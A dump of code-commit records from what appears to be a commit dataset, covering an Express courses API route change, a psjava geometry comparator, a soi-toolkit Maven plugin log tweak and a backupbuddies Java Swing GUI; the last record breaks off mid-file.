Course(); catalog.enroll( function failed(err){ res.status(200).send({result:false, errors:err}); }, {id: req.user._id}, {id: req.params.courseId}, function (followed) { res.status(200).json({result:true, enrollment: followed}); }, // isEnrolled -> true true); }); /** * PUT * */ router.put('/course/:courseId/leave', function(req, res, next) { if(!req.params.courseId) res.status(500).send('parameter not complete'); if (!req.user) res.status(401).send('Unauthorized'); var catalog = new Course(); catalog.leave( function failed(err){ res.status(200).send({result:false, errors:err}); }, {id: req.user._id}, {id: req.params.courseId}, function () { res.status(200).json({result:true}); }); }); module.exports = router;
add addManager route
routes/api/courses.js
add addManager route
<ide><path>outes/api/courses.js <ide> var multiparty = require('connect-multiparty'); <ide> var multipartyMiddleware = multiparty(); <ide> var router = express.Router(); <add>var mongoose = require('mongoose'); <ide> <ide> /** <ide> * POST <ide> } <ide> <ide> var catalog = new Course(); <del> req.body.userId = req.user._id; <del> req.body.courseId = req.params.courseId; <add> req.body.userId = mongoose.Types.ObjectId(req.user._id); <add> req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); <ide> <ide> // format the tags data structure <ide> if(req.body.tags) { <ide> return res.status(401).send('Unauthorized'); <ide> <ide> var catalog = new Course(); <add> <add> var uid = mongoose.Types.ObjectId(req.user._id); <add> var courseId = mongoose.Types.ObjectId(req.params.courseId); <add> <ide> catalog.enroll( <ide> function failed(err){ <ide> res.status(200).send({result:false, errors:err}); <ide> }, <del> {id: req.user._id}, <del> {id: req.params.courseId}, <add> <add> {id: uid}, <add> {id: courseId}, <add> <ide> function (followed) { <ide> res.status(200).json({result:true, enrollment: followed}); <ide> }, <ide> * <ide> */ <ide> router.put('/course/:courseId/leave', function(req, res, next) { <del> if(!req.params.courseId) <del> res.status(500).send('parameter not complete'); <del> <ide> if (!req.user) <ide> res.status(401).send('Unauthorized'); <add> <add> var uid = mongoose.Types.ObjectId(req.user._id); <add> var courseId = mongoose.Types.ObjectId(req.params.courseId); <ide> <ide> var catalog = new Course(); <ide> catalog.leave( <ide> function failed(err){ <ide> res.status(200).send({result:false, errors:err}); <ide> }, <del> {id: req.user._id}, <del> {id: req.params.courseId}, <add> <add> {id: uid}, <add> {id: courseId}, <add> <ide> function () { <ide> res.status(200).json({result:true}); <ide> }); <ide> }); <add> <add>/** <add> * PUT <add> * add a username as a manager into a course <add> */ <add>router.put('/course/:courseId/addManager', function(req, res, next){ <add> if (!req.user) { <add> return res.status(401).send('Unauthorized'); <add> } <add> <add> req.body.createdBy = mongoose.Types.ObjectId(req.user._id); <add> req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); <add> <add> var catalog = new Course(); <add> <add> // format the tags data structure <add> if(req.body.managers) { <add> // because the data is in {text:the-tag} format. let's just get the values. <add> var managerSlugs = []; <add> var tTags = JSON.parse(req.body.managers); <add> for (var i in tTags) { <add> managerSlugs.push(tTags[i]['text']); <add> } <add> req.body.managers = managerSlugs; <add> } <add> <add> catalog.addManager( <add> function (err) { <add> helper.resReturn(err, res); <add> }, <add> <add> // parameters <add> req.body, <add> <add> function (course) { <add> res.status(200).json({result:true, course: course}); <add> } <add> ); <add>}); <add> <ide> module.exports = router;
Java
mit
error: pathspec 'src/main/java/org/psjava/ds/geometry/PointByYXComparator.java' did not match any file(s) known to git
fcb6616cf18d56ba3bbbebba82734c099a94af8e
1
psjava/psjava,psjava/psjava
package org.psjava.ds.geometry;

import org.psjava.util.SeriesComparator;

import java.util.Comparator;

public class PointByYXComparator {

	@SuppressWarnings("unchecked")
	public static <T> Comparator<Point2D<T>> create(Comparator<T> comp) {
		return SeriesComparator.create(PointByYComparator.create(comp), PointByXComparator.create(comp));
	}

	private PointByYXComparator() {
	}

}
src/main/java/org/psjava/ds/geometry/PointByYXComparator.java
add PointByYXComparator
src/main/java/org/psjava/ds/geometry/PointByYXComparator.java
add PointByYXComparator
<ide><path>rc/main/java/org/psjava/ds/geometry/PointByYXComparator.java
<add>package org.psjava.ds.geometry;
<add>
<add>import org.psjava.util.SeriesComparator;
<add>
<add>import java.util.Comparator;
<add>
<add>public class PointByYXComparator {
<add>
<add> @SuppressWarnings("unchecked")
<add> public static <T> Comparator<Point2D<T>> create(Comparator<T> comp) {
<add> return SeriesComparator.create(PointByYComparator.create(comp), PointByXComparator.create(comp));
<add> }
<add>
<add> private PointByYXComparator() {
<add> }
<add>
<add>}
Java
apache-2.0
f125a6ae6068a3f567226d2998e3f980b2d90432
0
soi-toolkit/soi-toolkit-mule
/* * Licensed to the soi-toolkit project under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The soi-toolkit project licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.soitoolkit.tools.generator.maven; import java.io.File; import java.net.URL; import java.util.ArrayList; import java.util.List; import org.apache.maven.plugin.AbstractMojo; import org.apache.maven.plugin.MojoExecutionException; import org.soitoolkit.tools.generator.Generator; import org.soitoolkit.tools.generator.IntegrationComponentGenerator; import org.soitoolkit.tools.generator.model.ModelFactory; import org.soitoolkit.tools.generator.model.enums.DeploymentModelEnum; import org.soitoolkit.tools.generator.model.enums.MuleVersionEnum; import org.soitoolkit.tools.generator.model.enums.TransportEnum; /** * Goal for creating an new Integration Component * * @goal genIC * @requiresProject false * * @author Magnus Larsson */ public class GenIntegrationComponentMojo extends AbstractMojo { /** * ArtifactId. * @parameter expression="${artifactId}" default-value="sample1" * @required */ private String artifactId; /** * GroupId. * @parameter expression="${groupId}" default-value="org.sample" * @required */ private String groupId; /** * Version. * @parameter expression="${version}" default-value="1.0.0-SNAPSHOT" * @required */ private String version; /** * Mule version. * @parameter expression="${muleVersion}" default-value="3.1.1" * @required */ private String muleVersion; /** * Deploy model. * @parameter expression="${deployModel}" default-value="Standalone" * @required */ private String deployModel; /** * Connectors. * @parameter expression="${connectors}" default-value="JDBC,FTP,SFTP" // Servlet * @required */ private String connectors; /** * Groovy Model. * @parameter expression="${groovyModel}" * @optional */ private URL groovyModel; /** * Location of the output folder. * @parameter expression="${outDir}" default-value="." 
* @required */ private File outDir; private static String[] allowedConnectors = new String[] {"JDBC","FTP","SFTP","Servlet"}; public void execute() throws MojoExecutionException { getLog().info(""); getLog().info("========================================="); getLog().info("= Creating an new Integration Component ="); getLog().info("========================================="); getLog().info(""); getLog().info("ARGUMENTS:"); getLog().info("(change an arg by suppling: -Darg=value):"); getLog().info(""); getLog().info("outDir=" + outDir.getPath()); // getLog().info("outDir=" + outDir.getAbsolutePath()); // try { // getLog().info("outDir=" + outDir.getCanonicalPath()); // } catch (IOException e) { // // TODO Auto-generated catch block // e.printStackTrace(); // } getLog().info("artifactId=" + artifactId); getLog().info("groupId=" + groupId); getLog().info("version=" + version); getLog().info("muleVersion=" + muleVersion); getLog().info("deployModel=" + deployModel); getLog().info("connectors=JMS," + connectors); getLog().info("groovyModel=" + groovyModel); getLog().info(""); initGroovyModel(); MuleVersionEnum muleVersionEnum = initMuleVersion(muleVersion); DeploymentModelEnum deployModelEnum = initDeployModel(deployModel); List<TransportEnum> connectorsEnum = initConnectors(connectors); Generator g = new IntegrationComponentGenerator(System.out, groupId, artifactId, version, muleVersionEnum, deployModelEnum, connectorsEnum, outDir.getPath()); g.startGenerator(); } private void initGroovyModel() throws MojoExecutionException { if (groovyModel != null) { try { ModelFactory.setModelGroovyClass(groovyModel); } catch (Exception e) { throw new MojoExecutionException("Invalid Groovy model: " + groovyModel, e); } } } private MuleVersionEnum initMuleVersion(String muleVersion) throws MojoExecutionException { MuleVersionEnum muleVersionEnum = null; try { muleVersionEnum = MuleVersionEnum.getByLabel(muleVersion); } catch (Exception e) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues(), e); } if (muleVersionEnum == null) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues()); } return muleVersionEnum; } private DeploymentModelEnum initDeployModel(String deployModel) throws MojoExecutionException { DeploymentModelEnum deployModelEnum = null; try { deployModelEnum = DeploymentModelEnum.getByLabel(deployModel); } catch (Exception e) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues(), e); } if (deployModelEnum == null) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues()); } return deployModelEnum; } private List<TransportEnum> initConnectors(String connectors) throws MojoExecutionException { List<TransportEnum> ts = new ArrayList<TransportEnum>(); ts.add(TransportEnum.JMS); // Bail out if no extra connectors specified if (connectors.trim().length() == 0) return ts; String[] connectorArr = connectors.split(","); for (int i = 0; i < connectorArr.length; i++) { connectorArr[i] = connectorArr[i].trim(); } for (String connector : connectorArr) { TransportEnum t = getTransport(connector); ts.add(t); } return ts; } private TransportEnum getTransport(String connector) throws MojoExecutionException { TransportEnum transportEnum = null; for (String allowedConnector : 
allowedConnectors) { if (allowedConnector.equals(connector)) { transportEnum = TransportEnum.valueOf(connector); } } if (transportEnum == null) { throw new MojoExecutionException("Invalid connector: " + connector + ", allowed values: " + getAllowedConnectors()); } return transportEnum; } private String getAllowedConnectors() { String allowedConnectorsStr = ""; for (String allowedConnector : allowedConnectors) { allowedConnectorsStr += allowedConnector + " "; } return allowedConnectorsStr; } }
tools/soitoolkit-generator/soitoolkit-generator-maven-plugin/src/main/java/org/soitoolkit/tools/generator/maven/GenIntegrationComponentMojo.java
/* * Licensed to the soi-toolkit project under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The soi-toolkit project licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.soitoolkit.tools.generator.maven; import java.io.File; import java.net.URL; import java.util.ArrayList; import java.util.List; import org.apache.maven.plugin.AbstractMojo; import org.apache.maven.plugin.MojoExecutionException; import org.soitoolkit.tools.generator.Generator; import org.soitoolkit.tools.generator.IntegrationComponentGenerator; import org.soitoolkit.tools.generator.model.ModelFactory; import org.soitoolkit.tools.generator.model.enums.DeploymentModelEnum; import org.soitoolkit.tools.generator.model.enums.MuleVersionEnum; import org.soitoolkit.tools.generator.model.enums.TransportEnum; /** * Goal for creating an new Integration Component * * @goal genIC * @requiresProject false * * @author Magnus Larsson */ public class GenIntegrationComponentMojo extends AbstractMojo { /** * ArtifactId. * @parameter expression="${artifactId}" default-value="sample1" * @required */ private String artifactId; /** * GroupId. * @parameter expression="${groupId}" default-value="org.sample" * @required */ private String groupId; /** * Version. * @parameter expression="${version}" default-value="1.0.0-SNAPSHOT" * @required */ private String version; /** * Mule version. * @parameter expression="${muleVersion}" default-value="3.1.1" * @required */ private String muleVersion; /** * Deploy model. * @parameter expression="${deployModel}" default-value="Standalone" * @required */ private String deployModel; /** * Connectors. * @parameter expression="${connectors}" default-value="JDBC,FTP,SFTP" // Servlet * @required */ private String connectors; /** * Groovy Model. * @parameter expression="${groovyModel}" * @optional */ private URL groovyModel; /** * Location of the output folder. * @parameter expression="${outDir}" default-value="." 
* @required */ private File outDir; private static String[] allowedConnectors = new String[] {"JDBC","FTP","SFTP","Servlet"}; public void execute() throws MojoExecutionException { getLog().info(""); getLog().info("========================================="); getLog().info("= Creating an new Integration Component ="); getLog().info("========================================="); getLog().info(""); getLog().info("ARGUMENTS:"); getLog().info(""); getLog().info("outDir=" + outDir.getPath()); // getLog().info("outDir=" + outDir.getAbsolutePath()); // try { // getLog().info("outDir=" + outDir.getCanonicalPath()); // } catch (IOException e) { // // TODO Auto-generated catch block // e.printStackTrace(); // } getLog().info("artifactId=" + artifactId); getLog().info("groupId=" + groupId); getLog().info("version=" + version); getLog().info("muleVersion=" + muleVersion); getLog().info("deployModel=" + deployModel); getLog().info("connectors=JMS," + connectors); getLog().info("groovyModel=" + groovyModel); getLog().info(""); initGroovyModel(); MuleVersionEnum muleVersionEnum = initMuleVersion(muleVersion); DeploymentModelEnum deployModelEnum = initDeployModel(deployModel); List<TransportEnum> connectorsEnum = initConnectors(connectors); Generator g = new IntegrationComponentGenerator(System.out, groupId, artifactId, version, muleVersionEnum, deployModelEnum, connectorsEnum, outDir.getPath()); g.startGenerator(); } private void initGroovyModel() throws MojoExecutionException { if (groovyModel != null) { try { ModelFactory.setModelGroovyClass(groovyModel); } catch (Exception e) { throw new MojoExecutionException("Invalid Groovy model: " + groovyModel, e); } } } private MuleVersionEnum initMuleVersion(String muleVersion) throws MojoExecutionException { MuleVersionEnum muleVersionEnum = null; try { muleVersionEnum = MuleVersionEnum.getByLabel(muleVersion); } catch (Exception e) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues(), e); } if (muleVersionEnum == null) { throw new MojoExecutionException("Invalid Mule version: " + muleVersion + ", allowed values: " + MuleVersionEnum.allowedLabelValues()); } return muleVersionEnum; } private DeploymentModelEnum initDeployModel(String deployModel) throws MojoExecutionException { DeploymentModelEnum deployModelEnum = null; try { deployModelEnum = DeploymentModelEnum.getByLabel(deployModel); } catch (Exception e) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues(), e); } if (deployModelEnum == null) { throw new MojoExecutionException("Invalid deploy model: " + deployModel + ", allowed values: " + DeploymentModelEnum.allowedLabelValues()); } return deployModelEnum; } private List<TransportEnum> initConnectors(String connectors) throws MojoExecutionException { List<TransportEnum> ts = new ArrayList<TransportEnum>(); ts.add(TransportEnum.JMS); // Bail out if no extra connectors specified if (connectors.trim().length() == 0) return ts; String[] connectorArr = connectors.split(","); for (int i = 0; i < connectorArr.length; i++) { connectorArr[i] = connectorArr[i].trim(); } for (String connector : connectorArr) { TransportEnum t = getTransport(connector); ts.add(t); } return ts; } private TransportEnum getTransport(String connector) throws MojoExecutionException { TransportEnum transportEnum = null; for (String allowedConnector : allowedConnectors) { if (allowedConnector.equals(connector)) { 
transportEnum = TransportEnum.valueOf(connector); } } if (transportEnum == null) { throw new MojoExecutionException("Invalid connector: " + connector + ", allowed values: " + getAllowedConnectors()); } return transportEnum; } private String getAllowedConnectors() { String allowedConnectorsStr = ""; for (String allowedConnector : allowedConnectors) { allowedConnectorsStr += allowedConnector + " "; } return allowedConnectorsStr; } }
Update issue 109 Added online info on how to change args
tools/soitoolkit-generator/soitoolkit-generator-maven-plugin/src/main/java/org/soitoolkit/tools/generator/maven/GenIntegrationComponentMojo.java
Update issue 109
<ide><path>ools/soitoolkit-generator/soitoolkit-generator-maven-plugin/src/main/java/org/soitoolkit/tools/generator/maven/GenIntegrationComponentMojo.java
<ide> getLog().info("=========================================");
<ide> getLog().info("");
<ide> getLog().info("ARGUMENTS:");
<add> getLog().info("(change an arg by suppling: -Darg=value):");
<ide> getLog().info("");
<ide> getLog().info("outDir=" + outDir.getPath());
<ide> // getLog().info("outDir=" + outDir.getAbsolutePath());
Java
mit
482ccaef02672312d165e9c796e9918796a2ec3a
0
k-danna/backupbuddies,k-danna/backupbuddies
package backupbuddies.gui; import java.awt.*; import java.awt.event.*; import javax.swing.*; import javax.swing.event.DocumentEvent; import javax.swing.event.DocumentListener; import javax.swing.event.ChangeListener; import javax.swing.event.ChangeEvent; import java.util.List; import java.util.ArrayList; import java.util.Map; import java.util.Set; import java.util.HashMap; import java.lang.*; //do not import util.* //there is a Timer class in util and swing that conflict //currently using swing timer import backupbuddies.shared.Interface; import backupbuddies.gui.ListModel; import static backupbuddies.Debug.*; @SuppressWarnings("serial") public class GuiMain extends JFrame { //load assets, lists etc before creating the gui static JFrame frame; static JTextField saveDir = new JTextField(); static final DefaultListModel<String> userModel = new DefaultListModel<String>(); static final DefaultListModel<String> fileModel = new DefaultListModel<String>(); static DefaultListModel<String> files = new DefaultListModel<String>(); static DefaultListModel<ListModel> test = new DefaultListModel<ListModel>(); static JList<ListModel> hi = new JList<ListModel>(); static DefaultListModel<ListModel> debug = new DefaultListModel<ListModel>(); static final JTextArea log = new JTextArea(5, 20); static List<String> prevEvents = new ArrayList<>(); static ImageIcon statusRed = new ImageIcon("bin/backupbuddies/gui/assets/RedCircle.png"); static ImageIcon statusYellow = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/YellowCircle.png"); static ImageIcon statusGreen = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/GreenCircle.png"); static JList<ListModel> userMap = fetchAndProcess("users"); static JList<ListModel> fileMap = fetchAndProcess("files"); //process lists returned from networking //NOTE: to speed this up we can just do it in the interface methods //iteration already occurs there public static JList<ListModel> fetchAndProcess(String type) { //get data JList<ListModel> map = new JList<ListModel>(); //debug = new DefaultListModel<>(); if (type.equals("users")) debug = Interface.fetchUserList(); else if (type.equals("files")) debug = Interface.fetchFileList(); return map; } //updates ui on interval public static void startIntervals(int interval) { ActionListener updateUI = new ActionListener() { public void actionPerformed(ActionEvent e) { userMap = fetchAndProcess("users"); fileMap = fetchAndProcess("files"); //FIXME: this gets slower as more events are added //prevArray --> int (length of last returned array) //change to check length of returned array //append the last (len(events) - prevLength) elements to log //if this is negative they cleared the event log //only reset prevArraysize variable List<String> events = Interface.getEventLog(); for (String event : events) { if (!prevEvents.contains(event)) { log.append(event + "\n"); log.setCaretPosition(log.getDocument().getLength()); } } prevEvents = events; } }; Timer timer = new Timer(interval, updateUI); timer.setRepeats(true); timer.start(); } //user chooses directory to save to public static void setSaveDir() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose save location"); browser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY); browser.setAcceptAllFileFilterUsed(false); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { saveDir.setText(browser.getSelectedFile().toString()); Interface.testFile(saveDir.getText()); } } //user selects a file and it uploads to network public static void 
chooseAndUpload() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose file to upload"); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { //since download will be separate name and directory //might be easier to keep separate Interface.uploadFile(browser.getSelectedFile().getName(), browser.getCurrentDirectory().toString()); } } //user downloads a file to save directory (and chooses if not set) public static void setDirAndDownload() { //FIXME: need to have a list of uploaded files to choose from //String fileToGet = "test.txt"; if (saveDir.getText().equals("")) { setSaveDir(); } int[] selected = hi.getSelectedIndices(); for(int i=0; i<selected.length; i++){ //System.out.printf("Index: %d %s\n", i, hi.getModel().getElementAt(selected[i]).getName()); Interface.downloadFile(hi.getModel().getElementAt(selected[i]).getName(), saveDir.getText()); } } //upload, download, save control buttons public static JPanel controlPanel() { //create panel JPanel controlPanel = new JPanel(); //create components JLabel fileLabel = new JLabel("backup your files"); JButton uploadButton = new JButton("upload"); JButton downloadButton = new JButton("download"); JButton pathButton = new JButton("save to..."); //bind methods to buttons uploadButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { chooseAndUpload(); } }); pathButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { setSaveDir(); } }); downloadButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { setDirAndDownload(); } }); //add components to panel and specify orientation controlPanel.add(fileLabel); controlPanel.add(pathButton); controlPanel.add(uploadButton); controlPanel.add(downloadButton); controlPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return controlPanel; } //allows user to input ip and pass and connect to network public static JPanel loginPanel() { //create panel final JPanel loginPanel = new JPanel(); //create components final JLabel loginLabel = new JLabel("join a network:"); final JButton loginButton = new JButton("join"); final JTextField ipField = new JTextField("network ip"); final JTextField passField = new JTextField("network password"); //bind methods to buttons loginButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.login(ipField.getText(), passField.getText()); } }); ipField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { ipField.setText(""); } }); passField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { passField.setText(""); } }); //add components to panel and specify orientation loginPanel.add(loginLabel); loginPanel.add(ipField); loginPanel.add(passField); loginPanel.add(loginButton); loginPanel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return loginPanel; } //list of peers in the network //TODO: multiple selection //TODO: renders images public static JScrollPane userListPanel() { //userMap = fetchAndProcess("users"); JList<ListModel> list = new JList<ListModel>(Interface.fetchUserList()); list.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(list); pane.setPreferredSize(new Dimension(300, 100)); return pane; } //list of files you can recover //TODO: multiple selection //TODO: renders images public static JScrollPane fileListPanel(String 
search) { test = (Interface.fetchFileList()); hi.setModel(test); hi.setCellRenderer(new ListRenderer()); JScrollPane pane = new JScrollPane(hi); pane.setPreferredSize(new Dimension(300, 100)); return pane; } public static void fileSearch(String search){ int cap = debug.getSize(); test.clear(); for(int i=0; i<cap; i++){ ListModel model = debug.elementAt(i); String name = model.getName(); if(name.indexOf(search) != -1){ ListModel add = new ListModel(model.getName(), model.getStatus()); test.addElement(add); } } } public static JPanel searchPanel() { JPanel panel = new JPanel(); JLabel label = new JLabel("search for file:"); JTextField search = new JTextField("search"); search.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { search.setText(""); } }); search.getDocument().addDocumentListener(new DocumentListener(){ @Override public void changedUpdate(DocumentEvent arg0) { System.out.printf("changed\n"); } @Override public void insertUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } @Override public void removeUpdate(DocumentEvent arg0) { fileSearch(search.getText()); } }); panel.add(label); panel.add(search); return panel; } public static JPanel varsPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel varsPanelLabel = new JLabel("enter encryption key:"); final JButton lockPassButton = new JButton("confirm key"); final JTextField keyField = new JTextField("encryption key"); //bind methods to buttons lockPassButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { Interface.setEncryptKey(keyField.getText()); } }); keyField.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { keyField.setText(""); } }); int min = 0; int max = 1000; int init = 1; final JLabel sliderLabel = new JLabel("storage (GB):"); final JSlider slider = new JSlider(JSlider.HORIZONTAL, min, max, init); slider.setMajorTickSpacing(max / 10); slider.setPaintTicks(true); slider.addChangeListener(new ChangeListener() { @Override public void stateChanged(ChangeEvent e) { if (!slider.getValueIsAdjusting()) { Interface.setStorageSpace(slider.getValue()); } } }); //add components to panel and specify orientation panel.add(varsPanelLabel); panel.add(keyField); panel.add(lockPassButton); panel.add(sliderLabel); panel.add(slider); panel.setComponentOrientation( ComponentOrientation.LEFT_TO_RIGHT); return panel; } public static JPanel logPanel() { //create panel final JPanel panel = new JPanel(); //create components final JLabel logLabel = new JLabel("event log"); log.setEditable(false); //log.append(text + newline) panel.add(logLabel); panel.add(log); return panel; } //bind panels to frame and display the gui public static void startGui() { javax.swing.SwingUtilities.invokeLater(new Runnable() { public void run() { //start those intervals startIntervals(1000); //create the window and center it on screen frame = new JFrame("BackupBuddies"); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.setResizable(false); Container contentPane = frame.getContentPane(); SpringLayout layout = new SpringLayout(); contentPane.setLayout(layout); //these values are used to center despite pack() overriding frame.setSize(700, 400); //frame.setLocationRelativeTo(null); //FIXME: migrate to SpringLayout //this uses the easy yet terrible BorderLayout to //prototype each panel //populate the window JPanel loginPanel = new JPanel(); JPanel controlPanel = new JPanel(); JPanel searchPanel 
= new JPanel(); JPanel varsPanel = new JPanel(); JPanel logPanel = new JPanel(); JScrollPane userListPanel = new JScrollPane(); JScrollPane fileListPanel = new JScrollPane(); JScrollPane hit = new JScrollPane(); loginPanel = loginPanel(); controlPanel = controlPanel(); userListPanel = userListPanel(); fileListPanel = fileListPanel(""); searchPanel = searchPanel(); varsPanel = varsPanel(); logPanel = logPanel(); contentPane.add(loginPanel); contentPane.add(controlPanel); contentPane.add(userListPanel); contentPane.add(fileListPanel); contentPane.add(searchPanel); contentPane.add(varsPanel); contentPane.add(logPanel); contentPane.add(hit); //set locations for each panel layout.putConstraint(SpringLayout.SOUTH, varsPanel, 5, SpringLayout.SOUTH, contentPane); layout.putConstraint(SpringLayout.SOUTH, logPanel, -50, SpringLayout.SOUTH, contentPane); //layout.putConstraint(SpringLayout.EAST, logPanel, 5, // SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, loginPanel, 5, SpringLayout.NORTH, contentPane); layout.putConstraint(SpringLayout.WEST, loginPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, userListPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.NORTH, userListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.NORTH, controlPanel, 5, SpringLayout.SOUTH, userListPanel); layout.putConstraint(SpringLayout.WEST, controlPanel, 5, SpringLayout.WEST, contentPane); layout.putConstraint(SpringLayout.WEST, fileListPanel, 20, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, fileListPanel, 5, SpringLayout.SOUTH, loginPanel); layout.putConstraint(SpringLayout.WEST, searchPanel, 25, SpringLayout.EAST, userListPanel); layout.putConstraint(SpringLayout.NORTH, searchPanel, 7, SpringLayout.NORTH, contentPane); //display the window //pack - layout manager auto sizes and auto locates //fixes size issue with insets/border of frame //aka use minimum frame size to display the content //frame.pack(); frame.validate(); frame.repaint(); frame.setVisible(true); } }); } }
backupbuddies/gui/GuiMain.java
package backupbuddies.gui; import java.awt.*; import java.awt.event.*; import javax.swing.*; import javax.swing.event.DocumentEvent; import javax.swing.event.DocumentListener; import javax.swing.event.ChangeListener; import javax.swing.event.ChangeEvent; import java.util.List; import java.util.ArrayList; import java.util.Map; import java.util.Set; import java.util.HashMap; import java.lang.*; import java.lang.Object; //do not import util.* //there is a Timer class in util and swing that conflict //currently using swing timer import backupbuddies.shared.Interface; import backupbuddies.gui.ListModel; import static backupbuddies.Debug.*; @SuppressWarnings("serial") public class GuiMain extends JFrame { //load assets, lists etc before creating the gui static JFrame frame; static JTextField saveDir = new JTextField(); static final DefaultListModel<String> userModel = new DefaultListModel<String>(); static final DefaultListModel<String> fileModel = new DefaultListModel<String>(); static DefaultListModel<String> files = new DefaultListModel<String>(); static DefaultListModel<ListModel> test = new DefaultListModel<ListModel>(); static JList<ListModel> hi = new JList<ListModel>(); static DefaultListModel<ListModel> debug = new DefaultListModel<ListModel>(); static final JTextArea log = new JTextArea(5, 20); static List<String> prevEvents = new ArrayList<>(); static ImageIcon statusRed = new ImageIcon("bin/backupbuddies/gui/assets/RedCircle.png"); static ImageIcon statusYellow = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/YellowCircle.png"); static ImageIcon statusGreen = new ImageIcon("bin/backupbuddies/backupbuddies/gui/assets/GreenCircle.png"); static JList<ListModel> userMap = fetchAndProcess("users"); static JList<ListModel> fileMap = fetchAndProcess("files"); //process lists returned from networking //NOTE: to speed this up we can just do it in the interface methods //iteration already occurs there public static JList<ListModel> fetchAndProcess(String type) { //get data JList<ListModel> map = new JList<ListModel>(); //debug = new DefaultListModel<>(); if (type.equals("users")) debug = Interface.fetchUserList(); else if (type.equals("files")) debug = Interface.fetchFileList(); return map; } //updates ui on interval public static void startIntervals(int interval) { ActionListener updateUI = new ActionListener() { public void actionPerformed(ActionEvent e) { userMap = fetchAndProcess("users"); fileMap = fetchAndProcess("files"); //FIXME: this gets slower as more events are added //prevArray --> int (length of last returned array) //change to check length of returned array //append the last (len(events) - prevLength) elements to log //if this is negative they cleared the event log //only reset prevArraysize variable List<String> events = Interface.getEventLog(); for (String event : events) { if (!prevEvents.contains(event)) { log.append(event + "\n"); log.setCaretPosition(log.getDocument().getLength()); } } prevEvents = events; } }; Timer timer = new Timer(interval, updateUI); timer.setRepeats(true); timer.start(); } //user chooses directory to save to public static void setSaveDir() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose save location"); browser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY); browser.setAcceptAllFileFilterUsed(false); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { saveDir.setText(browser.getSelectedFile().toString()); Interface.testFile(saveDir.getText()); } } //user selects a file and it uploads to 
network public static void chooseAndUpload() { JFileChooser browser = new JFileChooser(); browser.setDialogTitle("choose file to upload"); if (browser.showOpenDialog(frame) == JFileChooser.APPROVE_OPTION) { //since download will be separate name and directory //might be easier to keep separate Interface.uploadFile(browser.getSelectedFile().getName(), browser.getCurrentDirectory().toString()); } } //user downloads a file to save directory (and chooses if not set) public static void setDirAndDownload() { //FIXME: need to have a list of uploaded files to choose from String fileToGet = "test.txt"; if (saveDir.getText().equals("")) { setSaveDir(); } Interface.downloadFile(fileToGet, saveDir.getText()); } //upload, download, save control buttons public static JPanel controlPanel() { //create panel JPanel controlPanel = new JPanel(); //create components JLabel fileLabel = new JLabel("backup your files"); JButton uploadButton = new JButton("upload"); JButton downloadButton = new JButton("download"); JButton pathButton = new JButton("save to..."); //bind methods to buttons uploadButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { chooseAndUpload(); } }); pathButton.addActionListener(new ActionListener() { @Override public void actionPerformed(ActionEvent e) { setSaveDir(); } }); downloadButton.addActionListener(new ActionListener() { @Override public void 